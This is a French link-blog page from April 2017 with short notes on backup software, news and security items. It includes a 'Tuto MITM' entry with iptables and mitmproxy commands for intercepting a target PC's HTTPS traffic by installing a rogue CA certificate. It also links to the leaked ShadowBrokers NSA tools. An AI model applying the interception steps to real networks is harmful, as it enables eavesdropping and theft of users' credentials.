PROJET AUTOBLOG


shaarli-Links

Site original : shaarli-Links

⇐ retour index

Duplicati

mercredi 19 avril 2017 à 15:26
Outils de backup qui est pas mal.
Source :
https://github.com/duplicati/duplicati
Permalink

DAR - Disk ARchive

mercredi 19 avril 2017 à 14:49
Outil de backup.
http://dar.linux.free.fr/
https://sourceforge.net/projects/dar/files/dar/2.5.10/dar64-2.5.10-win64.zip/download

L'interface graphique :
https://sourceforge.net/projects/dargui/
https://sourceforge.net/projects/dargui/files/dargui/1.0/DarGUI-1.0-setup.exe/download
Permalink

Malaysia Airlines becomes first airline to track fleet with satellites

mercredi 19 avril 2017 à 13:53
Logique, vu les merdes qu'ils ont eu.
Permalink

DirSync Pro

mercredi 19 avril 2017 à 00:06
Outils de backup pour Linux, WIndows et Mac
Permalink

List of backup software - Wikipedia

mardi 18 avril 2017 à 23:59

Permalink

OpenNews - Les liens du Lapin Masqué

mardi 18 avril 2017 à 23:06
Tu parles de ça https://www.developpez.com/ et ça https://zestedesavoir.com/ ?
Permalink

Météo. Il ne pleut plus (assez) en Bretagne - #Dataspot - LeTelegramme.fr

mardi 18 avril 2017 à 16:49
Ouai, c'est la merde. Je suis obligé d'arroser mes plantes qui ont soif depuis des mois.
Bordel, ARROSER DES PLANTES en Bretagne !!! C'est juste pas normal !
D'habitude, c'est la saison des pluies mais là, rien, pas une goutte.

via https://shaar.libox.fr/?IAoImw
Permalink

AutoDraw

mardi 18 avril 2017 à 16:44
Génial !
Tu gribouilles un truc tout moche et une IA ce charge de trouver ce que tu cherches à dessiner en te proposant de bons dessins.
Un complément à Google translate.

via https://korben.info/autodraw-loutil-va-faire-de-artiste-accompli.html
Permalink

Space debris - a journey to Earth - YouTube

mardi 18 avril 2017 à 13:06

Permalink

This Phishing Attack is Almost Impossible to Detect On Chrome, Firefox and Opera

mardi 18 avril 2017 à 09:21
Pour éviter de se faire avoir, dans firefox, about:config puis :
network.IDN_show_punycode = true
Permalink

Les USA et SWIFT : une non révélation qui fait la Une… |

lundi 17 avril 2017 à 16:29
Suite de https://www.ecirtam.net/links/?4vXmmg
Permalink

Robot being trained to shoot guns is ‘not a Terminator’, insists Russian deputy Prime Minister | The Independent

lundi 17 avril 2017 à 09:45
Flippant
«The robot was originally created for rescue work, but military uses have also been suggested by engineers.The robot was originally created for rescue work, but military uses have also been suggested by engineers.»
-_-

Autre article :
http://www.newshub.co.nz/home/world/2017/04/russia-s-terrifying-new-robot-sparks-terminator-fears.html
Permalink

What you need to know about that latest NSA data dump - Recode

lundi 17 avril 2017 à 09:41
à lire aussi https://reflets.info/les-usa-et-swift-une-non-revelation-qui-fait-la-une/
Permalink

Tuto MITM

dimanche 16 avril 2017 à 23:32
Contexte :
2 PCs :
- une cible (PC à écouter)
- un attaquant qui se fait passer pour une passerelle (MITM)


### Sur le PC qui fait l'attaque ###
# https://mitmproxy.org/
sudo apt install mitmproxy

sudo sysctl -w net.ipv4.ip_forward=1

# si plusieurs interfaces
sudo iptables -I FORWARD -i <interface_écoute> -j ACCEPT
sudo iptables -I FORWARD -o <interface_écoute> -j ACCEPT
sudo iptables -I OUTPUT -o <interface_écoute> -j ACCEPT
sudo iptables -A FORWARD -i <interface_écoute> -o <interface_sortie> -j ACCEPT
sudo iptables -t nat -A POSTROUTING -o <interface_sortie> -j MASQUERADE
# fin

sudo iptables -t nat -A PREROUTING -i <interface_écoute> -p tcp --dport 443 -j REDIRECT --to-port 8080
sudo iptables -t nat -A PREROUTING -i <interface_écoute> -p tcp --dport 80 -j REDIRECT --to-port 8080

sudo mitmproxy -T --host -e


### Sur le PC cible (cas linux) ###

# choisir comme passerelle l'IP du PC qui fait l'attaque

# sur la cible, allez sur http://mitm.it et installer le certif
sudo mkdir /usr/share/ca-certificates/extra
sudo wget http://mitm.it/cert/pem -O /usr/share/ca-certificates/extra/mitmproxy_ca.crt
sudo dpkg-reconfigure ca-certificates

# ouvrir firefox et aller sur http://mitm.it/cert/pem
# confirmer l'ajout pour les sites


### Sur le PC cible (cas Windows) ###

# choisir comme passerelle l'IP du PC qui fait l'attaque

# ouvrir firefox et aller sur http://mitm.it/cert/pem
# confirmer l'ajout pour les sites
# télécharger le fichier mitmproxy-ca-cert.p12, le lancer et valider l'installation
# télécharger le fichier mitmproxy-ca-cert.pem, le renommer en .crt, le lancer et valider l'installation
Permalink

Autorité de certification perso

dimanche 16 avril 2017 à 17:35
# Création du certificat de l'autorité de certification :
openssl genrsa -out my_ca.key 8192
openssl req -new -x509 -days 365 -key my_ca.key -out my_ca.crt -subj '/CN=myca.com/O=Moi/C=FR'

# Ajouter l'autorité de certification au certif de l'OS :
sudo mkdir /usr/share/ca-certificates/extra
sudo cp my_ca.crt /usr/share/ca-certificates/extra/my_ca.crt
sudo dpkg-reconfigure ca-certificates

# Signer ses certificats :
openssl req -new -key exemple.com.key -out exemple.com.csr -subj "/CN=exemple.com/O=exemple.com/C=FR"
openssl x509 -req -days 365 -in exemple.com.csr -out exemple.com.crt -CA my_ca.crt -CAkey my_ca.key -CAcreateserial -CAserial exemple.com_ca.srl
cat exemple.com.crt exemple.com.key > exemple.com.pem
Permalink

Vous êtes anarchistes (le jeu) | Une histoire de l'anarchisme

dimanche 16 avril 2017 à 14:00
Murray Bookchin pour ma part.
https://fr.wikipedia.org/wiki/Murray_Bookchin
via https://links.cochi.se/?wcYJow
Permalink

#6 – Doutes - YATUU : YATUU

samedi 15 avril 2017 à 19:32
YATUU lance une nouvelle histoire publié le lundi et jeudi.
Elle a besoin d'un petit coup de pouce financier pour réaliser son travail :
https://www.tipeee.com/yatuu
Permalink

Lost in Translation — Steemit

samedi 15 avril 2017 à 09:48
Nouveau dump de TheShadowBrokers
https://yadi.sk/d/NJqzpqo_3GxZA4
https://github.com/misterch0c/shadowbroker
https://github.com/x0rz/EQGRP_Lost_in_Translation
https://www.reddit.com/r/netsec/comments/65d4zs/theshadowbrokers_eqgrp_lost_in_translation/
https://motherboard.vice.com/en_us/article/leaked-nsa-hacking-tools-were-worth-2-million
Permalink

GitHub - misterch0c/Awesome-Hacking: A collection of various awesome lists for hackers, pentesters and security researchers

samedi 15 avril 2017 à 09:44

Permalink

Les Internettes

vendredi 14 avril 2017 à 21:52
Chaîne Youtube de femmes vidéastes :
https://www.youtube.com/channel/UCCNyXbmCmmEJIeukYgD1yMA/channels
Permalink